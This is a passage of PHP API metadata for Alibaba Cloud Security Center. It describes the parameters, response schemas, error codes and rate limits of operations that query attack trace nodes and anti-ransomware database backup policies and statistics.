true,\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-XXXXXXXXX\\",\\n \\"TraceInfoDetail\\": {\\n \\"EdgeList\\": [\\n {\\n \\"Type\\": \\"trigger_file_alert\\",\\n \\"Time\\": \\"2022-12-21 10:24:42\\",\\n \\"StartId\\": \\"02b4bf933c8e3bb8b9465eee502xxxxx\\",\\n \\"Count\\": 1,\\n \\"EndId\\": \\"a1d1fa39e5345dcef3f9712172cxxxxx\\"\\n }\\n ],\\n \\"VertexList\\": [\\n {\\n \\"Type\\": \\"file_path\\",\\n \\"Time\\": \\"2022-12-21 10:24:42\\",\\n \\"Name\\": \\"/usr/local/tomcat\\",\\n \\"Id\\": \\"a1d1fa39e5345dcef3f9712172xxxxxx\\",\\n \\"Count\\": 1,\\n \\"NeighborList\\": [\\n {\\n \\"Type\\": \\"alert\\",\\n \\"HasMore\\": true,\\n \\"Count\\": 1\\n }\\n ]\\n }\\n ],\\n \\"EntityTypeList\\": [\\n {\\n \\"DisplayColor\\": \\"#fff\\",\\n \\"DbId\\": 0,\\n \\"DisplayTemplate\\": \\"[{\\\\\\"name\\\\\\":\\\\\\"${logtime}\\\\\\",\\\\\\"value\\\\\\":\\\\\\"$!{time}\\\\\\"}]\\",\\n \\"DisplayIcon\\": \\"https://img.alicdn.com/tfs/TB176P5OgDqK1RjSZSyXXaxEVXa-49-48.png\\",\\n \\"Limit\\": 0,\\n \\"GmtCreate\\": 0,\\n \\"Offset\\": 0,\\n \\"Namespace\\": \\"*\\",\\n \\"Name\\": \\"Alert\\",\\n \\"GmtModified\\": 0,\\n \\"Id\\": \\"Alert\\"\\n }\\n ],\\n \\"RelationTypeList\\": [\\n {\\n \\"ShowType\\": \\"Deprecated\\",\\n \\"DisplayColor\\": \\"#fff\\",\\n \\"Name\\": \\"file\\",\\n \\"Directed\\": 1,\\n \\"RelationTypeId\\": \\"netflow_to_process\\"\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeTraceInfoNode' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains the value.', 'type' => 'string', 'required' => false, 'example' => '127.0.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'VertexId', 'in' => 'query', 'schema' => ['description' => 'The vertex ID.', 'type' => 'string', 'required' => true, 'example' => '03da4e2350a3eb50cd25a18cexxxxxxx', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The vertex type. You can call the [DescribeTraceInfoDetail](~~DescribeTraceInfoDetail~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'SAS_ASSET', 'title' => ''], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['description' => 'The event name.'."\n" ."\n" .'>For more information, call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'WEBSHELL', 'title' => ''], ], [ 'name' => 'IncidentTime', 'in' => 'query', 'schema' => ['description' => 'The time when the event was first detected.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1635978934000', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query. You can call the [DescribeSuspEvents](~~DescribeSuspEvents~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '6f346617-eef9-45e6-b6d1-946xxxxxxxx', 'title' => ''], ], [ 'name' => 'From', 'in' => 'query', 'schema' => ['description' => 'The source identifier of the request. Set the value to sas.', 'type' => 'string', 'required' => true, 'example' => 'sas', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique request ID generated by Alibaba Cloud for this request.', 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62DXXXXXXXX', 'title' => ''], 'Node' => [ 'description' => 'The details of the trace node.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the trace node.', 'type' => 'string', 'example' => 'Alert', 'title' => ''], 'Name' => ['description' => 'The name of the trace node.', 'type' => 'string', 'example' => 'login', 'title' => ''], 'PropertyList' => [ 'description' => 'The detailed properties of the trace node.', 'type' => 'array', 'items' => [ 'description' => 'The detailed properties of the trace node.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The property name.', 'type' => 'string', 'example' => 'Incident', 'title' => ''], 'Value' => ['description' => 'The property value.', 'type' => 'string', 'example' => 'Alert', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query trace node information', 'summary' => 'Queries the details of a trace node.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeTraceInfoNode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeTraceInfoNode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62DXXXXXXXX\\",\\n \\"Node\\": {\\n \\"Type\\": \\"Alert\\",\\n \\"Name\\": \\"login\\",\\n \\"PropertyList\\": [\\n {\\n \\"Name\\": \\"Incident\\",\\n \\"Value\\": \\"Alert\\"\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'DescribeUniBackupDatabase' => [ 'summary' => 'Queries the details of databases in database protection policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the ECS instance.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'DatabaseType', 'in' => 'query', 'schema' => ['description' => 'The type of the database. Valid values:'."\n" ."\n" .'- **MYSQL**'."\n" .'- **MSSQL**'."\n" .'- **Oracle**.', 'type' => 'string', 'required' => false, 'example' => 'MYSQL', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'QueryType', 'in' => 'query', 'schema' => ['description' => 'The query type for the database. Valid values:'."\n" ."\n" .'- **create**: create'."\n" .'- **restore**: restore.', 'type' => 'string', 'required' => false, 'example' => 'create', 'title' => ''], ], [ 'name' => 'UniRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the database server.', 'type' => 'string', 'required' => false, 'example' => 'cn-hongkong', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of databases per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of databases.', 'type' => 'integer', 'format' => 'int32', 'example' => '25', 'title' => ''], 'Count' => ['description' => 'The number of databases on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'DatabaseList' => [ 'description' => 'The list of database details.', 'type' => 'array', 'items' => [ 'description' => 'The database details.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The instance status of the ECS instance. Valid values:'."\n" ."\n" .'- **Stopped**: stopped.'."\n" .'- **Running**: running.', 'type' => 'string', 'example' => 'Running', 'title' => ''], 'DatabaseType' => ['description' => 'The type of the database. Valid values:'."\n" ."\n" .'- **MYSQL**'."\n" .'- **MSSQL**'."\n" .'- **Oracle**.', 'type' => 'string', 'example' => 'MYSQL', 'title' => ''], 'DatabaseVersion' => ['description' => 'The version of the database.', 'type' => 'string', 'example' => '12.0.4100.1', 'title' => ''], 'DatabaseName' => ['description' => 'The name of the database.', 'type' => 'string', 'example' => 'apns_tt180', 'title' => ''], 'InstanceName' => ['description' => 'The name of the instance to which the database belongs.', 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'InstanceUuid' => ['description' => 'The unique identifier of the database backup client on the server.', 'type' => 'string', 'example' => '85878b284df911ec800000163e19****', 'title' => ''], 'CreatedByProduct' => ['description' => 'The method used to create the database. Valid values:'."\n" .'- **HBR**: Cloud Backup.'."\n" .'- **AEGIS**: Security Center.', 'type' => 'string', 'example' => 'AEGIS', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-bp15aho9hhftvmhw****', 'title' => ''], 'PolicyId' => ['description' => 'The ID of the anti-ransomware backup policy for the database.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'AgentStatus' => ['description' => 'The status of the database client agent. Valid values:'."\n" .'- **UNKNOWN**: unknown.'."\n" .'- **INSTALLED**: installed.'."\n" .'- **INSTALL_FAILED**: installation failed.'."\n" .'- **UNINSTALL_FAILED**: uninstallation failed.', 'type' => 'string', 'example' => 'INSTALLED', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query anti-ransomware databases', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupDatabase'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUniBackupDatabase', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 25,\\n \\"Count\\": 20\\n },\\n \\"DatabaseList\\": [\\n {\\n \\"Status\\": \\"Running\\",\\n \\"DatabaseType\\": \\"MYSQL\\",\\n \\"DatabaseVersion\\": \\"12.0.4100.1\\",\\n \\"DatabaseName\\": \\"apns_tt180\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"InstanceUuid\\": \\"85878b284df911ec800000163e19****\\",\\n \\"CreatedByProduct\\": \\"AEGIS\\",\\n \\"InstanceId\\": \\"i-bp15aho9hhftvmhw****\\",\\n \\"PolicyId\\": 123,\\n \\"AgentStatus\\": \\"INSTALLED\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeUniBackupPolicies' => [ 'summary' => 'Queries the list of database anti-ransomware policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'PolicyName', 'in' => 'query', 'schema' => ['description' => 'The name of the database anti-ransomware backup policy.', 'type' => 'string', 'required' => false, 'example' => 'auto_oracle_Hpm', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to display per page for a paginated query. The default number of entries per page is 20. If the PageSize parameter is left empty, 20 entries are returned by default.'."\n" .'> We recommend that you do not leave PageSize empty.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number from which to start displaying query results. Default value: **1**, which indicates that query results are displayed starting from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'ACF97412-FD09-4D1F-994F-34DF12BR****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of database anti-ransomware policies displayed per page in a paginated query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of database anti-ransomware policies.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => ['description' => 'The number of database anti-ransomware policies displayed on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], 'UniBackupPolicies' => [ 'description' => 'The collection of database anti-ransomware backup policies.', 'type' => 'array', 'items' => [ 'description' => 'The information about a database anti-ransomware backup policy.', 'type' => 'object', 'properties' => [ 'PolicyStatus' => ['description' => 'The status of the database anti-ransomware backup policy. Valid values:'."\n" ."\n" .'- **initiating**: Being initialized.'."\n" .'- **opening**: Being enabled.'."\n" .'- **closing**: Being disabled.'."\n" .'- **deleting**: Being deleted.'."\n" .'- **enabled**: Enabled.'."\n" .'- **disabled**: Disabled.', 'type' => 'string', 'example' => 'opening', 'title' => ''], 'ErrorMessage' => ['description' => 'The error message of the backup policy.', 'type' => 'string', 'example' => 'AttachRamRoleError', 'title' => ''], 'LatestBackResult' => ['description' => 'The result of the latest backup plan execution.', 'type' => 'string', 'example' => 'completed', 'title' => ''], 'UniRegionId' => ['description' => 'The region ID of the database server.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'PlanStatus' => ['description' => 'The status of the backup plan. Valid values:'."\n" ."\n" .'- **init**: Being initialized.'."\n" .'- **running**: Running.'."\n" .'- **completed**: Completed.'."\n" .'- **restoring**: Being restored.'."\n" .'- **creating**: Being created.'."\n" .'- **created**: Created.', 'type' => 'string', 'example' => 'creating', 'title' => ''], 'InstanceUuid' => ['description' => 'The unique identifier of the server database backup client.', 'type' => 'string', 'example' => 'cf1bcad4063f11ed800000163e0e****', 'title' => ''], 'PolicyName' => ['description' => 'The name of the database anti-ransomware backup policy.', 'type' => 'string', 'example' => 'auto_oracle_37f', 'title' => ''], 'AgentErrorMessage' => ['description' => 'The error message of the client exception.', 'type' => 'string', 'example' => 'INSTALL_TIMEOUT', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-9dp7mubt5wit6g0h****', 'title' => ''], 'AgentStatus' => ['description' => 'The status of the database client agent. Valid values:'."\n" .'- **UNKNOWN**: Unknown.'."\n" .'- **INSTALLED**: Installed.'."\n" .'- **INSTALL_FAILED**: Installation failed.'."\n" .'- **UNINSTALL_FAILED**: Uninstallation failed.', 'type' => 'string', 'example' => 'INSTALLED', 'title' => ''], 'DatabaseType' => ['description' => 'The type of the database. Valid values:'."\n" ."\n" .'- **MYSQL**'."\n" .'- **MSSQL**'."\n" .'- **Oracle**', 'type' => 'string', 'example' => 'MYSQL', 'title' => ''], 'ErrorCode' => ['description' => 'The error code returned when the backup plan execution fails.', 'type' => 'string', 'example' => 'EXPIRED', 'title' => ''], 'DatabaseName' => ['description' => 'The name of the database.', 'type' => 'string', 'example' => 'abc123', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'sql-test-001', 'title' => ''], 'LatestBackupTime' => ['description' => 'The time when the latest backup plan was executed.', 'type' => 'string', 'example' => '2022-01-01 00:00:11', 'title' => ''], 'InstanceStatus' => ['description' => 'The status of the ECS instance. Valid values:'."\n" ."\n" .'- **Stopped**: Stopped.'."\n" .'- **Running**: Running.', 'type' => 'string', 'example' => 'Running', 'title' => ''], 'PolicyId' => ['description' => 'The ID of the database anti-ransomware backup policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query anti-ransomware policies', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupPolicies'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUniBackupPolicies', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"ACF97412-FD09-4D1F-994F-34DF12BR****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 100,\\n \\"Count\\": 20\\n },\\n \\"UniBackupPolicies\\": [\\n {\\n \\"PolicyStatus\\": \\"opening\\",\\n \\"ErrorMessage\\": \\"AttachRamRoleError\\",\\n \\"LatestBackResult\\": \\"completed\\",\\n \\"UniRegionId\\": \\"cn-hangzhou\\",\\n \\"PlanStatus\\": \\"creating\\",\\n \\"InstanceUuid\\": \\"cf1bcad4063f11ed800000163e0e****\\",\\n \\"PolicyName\\": \\"auto_oracle_37f\\",\\n \\"AgentErrorMessage\\": \\"INSTALL_TIMEOUT\\",\\n \\"InstanceId\\": \\"i-9dp7mubt5wit6g0h****\\",\\n \\"AgentStatus\\": \\"INSTALLED\\",\\n \\"DatabaseType\\": \\"MYSQL\\",\\n \\"ErrorCode\\": \\"EXPIRED\\",\\n \\"DatabaseName\\": \\"abc123\\",\\n \\"InstanceName\\": \\"sql-test-001\\",\\n \\"LatestBackupTime\\": \\"2022-01-01 00:00:11\\",\\n \\"InstanceStatus\\": \\"Running\\",\\n \\"PolicyId\\": 123\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeUniBackupPolicyDetail' => [ 'summary' => 'Queries the details of an anti-ransomware backup policy for databases.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasA0IBMB'], ], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware backup policy for databases.'."\n" .'>You can call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'F35F45B0-5D6B-4238-BE02-A62D0760****', 'title' => ''], 'UniBackupPolicyDTO' => [ 'description' => 'The details of the anti-ransomware backup policy for databases.', 'type' => 'object', 'properties' => [ 'PolicyStatus' => ['description' => 'The status of the anti-ransomware backup policy for databases. Valid values:'."\n" ."\n" .'- **initiating**: Initializing.'."\n" .'- **opening**: Enabled.'."\n" .'- **closing**: Disabled.'."\n" .'- **deleting**: Being deleted.', 'type' => 'string', 'example' => 'opening', 'title' => ''], 'DatabaseType' => ['description' => 'The database type. Valid values:'."\n" ."\n" .'- **MYSQL**'."\n" .'- **MSSQL**'."\n" .'- **Oracle**.', 'type' => 'string', 'example' => 'ORACLE', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'sql-test-01', 'title' => ''], 'Retention' => ['description' => 'The number of days for which backup snapshots are retained.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'SpeedLimiter' => ['description' => 'The network bandwidth throttling for backup. Unit: bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '5242880', 'title' => ''], 'PolicyName' => ['description' => 'The name of the anti-ransomware backup policy for databases.', 'type' => 'string', 'example' => 'auto_test_sql', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'i-2zefcy2id5d60m9t****', 'title' => ''], 'PolicyId' => ['description' => 'The ID of the anti-ransomware backup policy for databases.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'AgentStatus' => ['description' => 'The status of the database client agent. Valid values:'."\n" .'- **UNKNOWN**: Unknown.'."\n" .'- **INSTALLED**: Installed.'."\n" .'- **INSTALL_FAILED**: Installation failed.'."\n" .'- **UNINSTALL_FAILED**: Uninstallation failed.', 'type' => 'string', 'example' => 'INSTALLED', 'title' => ''], 'AccountName' => ['description' => 'The database account name.', 'type' => 'string', 'example' => 'admin', 'title' => ''], 'FullPlan' => [ 'description' => 'The details of the full backup policy.', 'type' => 'object', 'properties' => [ 'StartTime' => ['description' => 'The start time of the full backup. Format: hh:mm:ss.', 'type' => 'string', 'example' => '00:10:00', 'title' => ''], 'PlanType' => ['description' => 'The unit of the interval cycle. Valid values:'."\n" ."\n" .'- **hourly**: hour'."\n" .'- **daily**: day'."\n" .'- **weekly**: week.', 'type' => 'string', 'example' => 'daily', 'title' => ''], 'Interval' => ['description' => 'The interval cycle.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Days' => [ 'description' => 'The days of the week on which the backup is performed.', 'type' => 'array', 'items' => ['description' => 'The day of the week on which the backup is performed. Valid values:'."\n" ."\n" .'- **0**: Sunday'."\n" .'- **1**: Monday'."\n" .'- **2**: Tuesday'."\n" .'- **3**: Wednesday'."\n" .'- **4**: Thursday'."\n" .'- **5**: Friday'."\n" .'- **6**: Saturday.', 'type' => 'string', 'example' => '0', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'IncPlan' => [ 'description' => 'The incremental backup policy.', 'type' => 'object', 'properties' => [ 'StartTime' => ['description' => 'The start time of the incremental backup. Format: hh:mm:ss.', 'type' => 'string', 'example' => '00:10:00', 'title' => ''], 'PlanType' => ['description' => 'The unit of the interval cycle. Valid values:'."\n" ."\n" .'- **hourly**: hour'."\n" .'- **daily**: day'."\n" .'- **weekly**: week.', 'type' => 'string', 'example' => 'daily', 'title' => ''], 'Interval' => ['description' => 'The interval cycle.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Days' => [ 'description' => 'The days of the week on which the backup is performed.', 'type' => 'array', 'items' => ['description' => 'The day of the week on which the backup is performed. Valid values:'."\n" ."\n" .'- **0**: Sunday'."\n" .'- **1**: Monday'."\n" .'- **2**: Tuesday'."\n" .'- **3**: Wednesday'."\n" .'- **4**: Thursday'."\n" .'- **5**: Friday'."\n" .'- **6**: Saturday.', 'type' => 'string', 'example' => '0', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query anti-ransomware policy details for databases', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupPolicyDetail'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUniBackupPolicyDetail', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F35F45B0-5D6B-4238-BE02-A62D0760****\\",\\n \\"UniBackupPolicyDTO\\": {\\n \\"PolicyStatus\\": \\"opening\\",\\n \\"DatabaseType\\": \\"ORACLE\\",\\n \\"InstanceName\\": \\"sql-test-01\\",\\n \\"Retention\\": 7,\\n \\"SpeedLimiter\\": 5242880,\\n \\"PolicyName\\": \\"auto_test_sql\\",\\n \\"InstanceId\\": \\"i-2zefcy2id5d60m9t****\\",\\n \\"PolicyId\\": 123,\\n \\"AgentStatus\\": \\"INSTALLED\\",\\n \\"AccountName\\": \\"admin\\",\\n \\"FullPlan\\": {\\n \\"StartTime\\": \\"00:10:00\\",\\n \\"PlanType\\": \\"daily\\",\\n \\"Interval\\": 2,\\n \\"Days\\": [\\n \\"0\\"\\n ]\\n },\\n \\"IncPlan\\": {\\n \\"StartTime\\": \\"00:10:00\\",\\n \\"PlanType\\": \\"daily\\",\\n \\"Interval\\": 2,\\n \\"Days\\": [\\n \\"0\\"\\n ]\\n }\\n }\\n}","type":"json"}]', ], 'DescribeUniBackupStatistics' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'TotalRestoreTaskCount' => ['description' => 'The total number of restoration records.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. The China Chinese Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****', 'title' => ''], 'UnprotectedDatabaseCount' => ['description' => 'The number of unprotected database instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'RestoringTaskCount' => ['description' => 'The number of tasks that are being restored.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ProtectedDatabaseCount' => ['description' => 'The number of protected database instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'TotalRecoverableCount' => ['description' => 'The number of recoverable database instances.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'RegionCountList' => [ 'description' => 'The list of regions in which database instances can be configured.', 'type' => 'array', 'items' => [ 'description' => 'The region in which database instances can be configured.', 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region ID of the database instance.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'AutomaticCount' => ['description' => 'The number of database instances that are automatically scanned.', 'type' => 'string', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query anti-ransomware backup statistics information for databases', 'summary' => 'Queries the statistics information of anti-ransomware backup for databases.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeUniBackupStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUniBackupStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 